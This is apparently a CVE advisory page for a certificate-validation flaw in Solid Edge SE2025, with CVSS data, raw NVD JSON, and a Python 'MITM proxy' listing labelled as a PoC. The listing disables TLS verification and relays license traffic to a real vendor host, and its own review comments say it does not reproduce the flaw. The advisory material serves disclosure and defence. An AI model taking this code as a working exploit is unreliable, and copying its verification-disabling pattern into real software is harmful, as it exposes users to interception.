Security Vulnerability Report
CVE-2025-40744 CVSS 7.5 HIGH

CVE-2025-40744

Published: 2025-11-11 21:15:38
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability has been identified in Solid Edge SE2025 (All versions < V225.0 Update 11). Affected applications do not properly validate client certificates to connect to License Service endpoint. This could allow an unauthenticated remote attacker to perform man in the middle attacks.

CVSS Details

CVSS Score (v3.1 base; the raw JSON record below also lists a CVSS 4.0 base score of 8.7)
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Solid Edge SE2025 < V225.0 Update 11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-40744 - listing published on the advisory page as a "PoC".
#
# Advisory context (from the page): Solid Edge SE2025, all versions before
# V225.0 Update 11, does not properly validate certificates when connecting
# to the License Service endpoint (CWE-295). The fixed release named on the
# page is V225.0 Update 11.
#
# NOTE(review): this listing does not reproduce the condition in the advisory.
#   * The listener built in start_mitm_proxy() is a plain-HTTP HTTPServer; no
#     TLS is configured on the listening side.
#   * The ssl settings below (check_hostname=False, CERT_NONE) apply only to
#     this script's own outbound connection. Nothing here touches certificate
#     validation inside the affected product.
#   * Only the POST body is written to the upstream TLS socket, and at most
#     4096 bytes are read back.
# A run of this script is therefore not evidence that an installation is or
# is not affected; compare the installed version with the fixed release.
import socket
import ssl
import threading  # imported by the original listing but never referenced
from http.server import HTTPServer, BaseHTTPRequestHandler


class MITMProxyHandler(BaseHTTPRequestHandler):
    """Relay the body of each POST to a fixed upstream host over TLS.

    The upstream TLS connection is opened with certificate and hostname
    verification switched off, so the identity of the peer is never checked.
    """

    @staticmethod
    def _unverified_client_context():
        """Return a client SSLContext with peer verification disabled."""
        tls_ctx = ssl.create_default_context()
        # check_hostname has to be cleared first: the ssl module refuses
        # CERT_NONE while hostname checking is still enabled.
        tls_ctx.check_hostname = False
        tls_ctx.verify_mode = ssl.CERT_NONE
        return tls_ctx

    def do_POST(self):
        """Forward the POST body upstream and return one chunk of the reply.

        Any exception raised after the context is built is printed and
        answered with HTTP 500.
        """
        # NOTE(review): endpoint name is hard-coded in the listing; the page
        # gives no source for it.
        upstream_host = 'license.siemens.com'
        upstream_port = 443

        tls_ctx = self._unverified_client_context()

        try:
            with socket.create_connection(
                (upstream_host, upstream_port), timeout=10
            ) as raw_conn, tls_ctx.wrap_socket(
                raw_conn, server_hostname=upstream_host
            ) as tls_conn:
                # A request without Content-Length makes int(None) raise,
                # which lands in the except branch below (HTTP 500).
                body_len = int(self.headers['Content-Length'])
                body = self.rfile.read(body_len)
                tls_conn.sendall(body)

                # Single read: anything past the first 4096 bytes is dropped.
                response = tls_conn.recv(4096)

                print(f"[+] Intercepted license response: {response[:100]}...")

                self.send_response(200)
                self.send_header('Content-type', 'application/octet-stream')
                self.end_headers()
                self.wfile.write(response)
        except Exception as e:
            print(f"[-] Error: {e}")
            self.send_error(500)


def start_mitm_proxy(port=8443):
    """Serve MITMProxyHandler over plain HTTP on every interface, forever.

    Args:
        port: TCP port to listen on (default 8443).
    """
    # '0.0.0.0' binds all local interfaces, not only loopback.
    bind_addr = ('0.0.0.0', port)
    httpd = HTTPServer(bind_addr, MITMProxyHandler)
    print(f"[*] MITM Proxy listening on port {port}")
    httpd.serve_forever()


if __name__ == '__main__':
    start_mitm_proxy()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-40744", "sourceIdentifier": "[email protected]", "published": "2025-11-11T21:15:37.557", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in Solid Edge SE2025 (All versions < V225.0 Update 11). Affected applications do not properly validate client certificates to connect to License Service endpoint. This could allow an unauthenticated remote attacker to perform man in the middle attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-522291.html", "source": "[email protected]"}]}}